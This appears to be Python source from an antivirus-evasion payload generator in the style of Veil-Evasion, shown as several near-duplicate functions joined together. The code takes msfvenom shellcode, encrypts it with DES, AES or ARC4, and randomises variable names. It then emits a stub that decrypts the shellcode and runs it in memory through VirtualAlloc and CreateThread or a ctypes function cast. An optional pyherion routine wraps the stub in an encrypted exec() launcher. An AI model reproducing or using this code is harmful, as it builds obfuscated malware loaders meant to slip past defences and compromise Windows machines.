def generate(self):
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandDESKey = randomizer.randomString()
RandDESPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
# Set IV Value and DES Key
iv = randomizer.randomKey(8)
DESKey = randomizer.randomKey(8)
# Create DES Object and encrypt our payload
desmain = DES.new(DESKey, DES.MODE_CFB, iv)
EncShellCode = desmain.encrypt(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
"string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
self.shellcode = shellcode.Shellcode()
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandDESKey = randomizer.randomString()
RandDESPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
# Set IV Value and DES Key
iv = randomizer.randomKey(8)
DESKey = randomizer.randomKey(8)
# Create DES Object and encrypt our payload
desmain = DES.new(DESKey, DES.MODE_CFB, iv)
EncShellCode = desmain.encrypt(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def pyherion(code):
"""
Generates a crypted hyperion'esque version of python code using
base64 and AES with a random key, wrapped in an exec() dynamic launcher.
code = the python source code to encrypt
Returns the encrypted python code as a string.
"""
imports = list()
codebase = list()
# strip out all imports from the code so pyinstaller can properly
# launch the code by preimporting everything at compiletime
for line in code.split("\n"):
if not line.startswith("#"): # ignore commented imports...
if "import" in line:
imports.append(line)
else:
codebase.append(line)
# generate a random 256 AES key and build our AES cipher
key = randomizer.randomKey(32)
cipherEnc = AES.new(key)
# encrypt the input file (less the imports)
encrypted = encryption.EncodeAES(cipherEnc, "\n".join(codebase))
# some random variable names
b64var = randomizer.randomString(5)
aesvar = randomizer.randomString(5)
# randomize our base64 and AES importing variable
imports.append("from base64 import b64decode as %s" % (b64var))
imports.append("from Crypto.Cipher import AES as %s" % (aesvar))
# shuffle up our imports
random.shuffle(imports)
# add in the AES imports and any imports found in the file
crypted = ";".join(imports) + "\n"
# the exec() launcher for our base64'ed encrypted string
crypted += "exec(%s(\"%s\"))" % (
b64var,
base64.b64encode(
"exec(%s.new(\"%s\").decrypt(%s(\"%s\")).rstrip('{'))\n" %
(aesvar, key, b64var, encrypted)))
return crypted
def pyherion(code):
"""
Generates a crypted hyperion'esque version of python code using
base64 and AES with a random key, wrapped in an exec() dynamic launcher.
code = the python source code to encrypt
Returns the encrypted python code as a string.
"""
imports = list()
codebase = list()
# strip out all imports from the code so pyinstaller can properly
# launch the code by preimporting everything at compiletime
for line in code.split("\n"):
if not line.startswith("#"): # ignore commented imports...
if "import" in line:
imports.append(line)
else:
codebase.append(line)
# generate a random 256 AES key and build our AES cipher
key = randomizer.randomKey(32)
cipherEnc = AES.new(key)
# encrypt the input file (less the imports)
encrypted = encryption.EncodeAES(cipherEnc, "\n".join(codebase))
# some random variable names
b64var = randomizer.randomString(5)
aesvar = randomizer.randomString(5)
# randomize our base64 and AES importing variable
imports.append("from base64 import b64decode as %s" %(b64var))
imports.append("from Crypto.Cipher import AES as %s" %(aesvar))
# shuffle up our imports
random.shuffle(imports)
# add in the AES imports and any imports found in the file
crypted = ";".join(imports) + "\n"
# the exec() launcher for our base64'ed encrypted string
crypted += "exec(%s(\"%s\"))" % (b64var,base64.b64encode("exec(%s.new(\"%s\").decrypt(%s(\"%s\")).rstrip('{'))\n" %(aesvar,key,b64var,encrypted)))
return crypted
def generate(self):
# Generate Shellcode Using msfvenom
self.shellcode = shellcode.Shellcode()
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandDecodeAES = randomizer.randomString()
RandCipherObject = randomizer.randomString()
RandDecodedShellcode = randomizer.randomString()
RandShellCode = randomizer.randomString()
RandPadding = randomizer.randomString()
# Generate Random AES Key
secret = randomizer.randomKey()
# Create Cipher Object with Generated Secret Key
cipher = AES.new(secret)
EncodedShellcode = encryption.EncodeAES(cipher, Shellcode)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandDecodeAES = randomizer.randomString()
RandCipherObject = randomizer.randomString()
RandDecodedShellcode = randomizer.randomString()
RandShellCode = randomizer.randomString()
RandPadding = randomizer.randomString()
# Generate Random AES Key
secret = randomizer.randomKey()
# Create Cipher Object with Generated Secret Key
cipher = AES.new(secret)
EncodedShellcode = encryption.EncodeAES(cipher, Shellcode)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandARCKey = randomizer.randomString()
RandARCPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
# Set IV Value and ARC Key
iv = randomizer.randomKey(8)
ARCKey = randomizer.randomKey(8)
# Create DES Object and encrypt our payload
arc4main = ARC4.new(ARCKey)
EncShellCode = arc4main.encrypt(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
"string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
else:
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandARCKey = randomizer.randomString()
RandARCPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
RandShellcode = randomizer.randomString()
RandReverseShell = randomizer.randomString()
RandMemoryShell = randomizer.randomString()
# Set IV Value and ARC Key
iv = randomizer.randomKey(8)
ARCKey = randomizer.randomKey(8)
# Create DES Object and encrypt our payload
arc4main = ARC4.new(ARCKey)
EncShellCode = arc4main.encrypt(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
"string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandARCKey = randomizer.randomString()
RandARCPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
# Set IV Value and ARC Key
iv = randomizer.randomKey(8)
ARCKey = randomizer.randomKey(8)
# Create DES Object and encrypt our payload
arc4main = ARC4.new(ARCKey)
EncShellCode = arc4main.encrypt(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
else:
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandARCKey = randomizer.randomString()
RandARCPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
RandShellcode = randomizer.randomString()
RandReverseShell = randomizer.randomString()
RandMemoryShell = randomizer.randomString()
# Set IV Value and ARC Key
iv = randomizer.randomKey(8)
ARCKey = randomizer.randomKey(8)
# Create DES Object and encrypt our payload
arc4main = ARC4.new(ARCKey)
EncShellCode = arc4main.encrypt(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode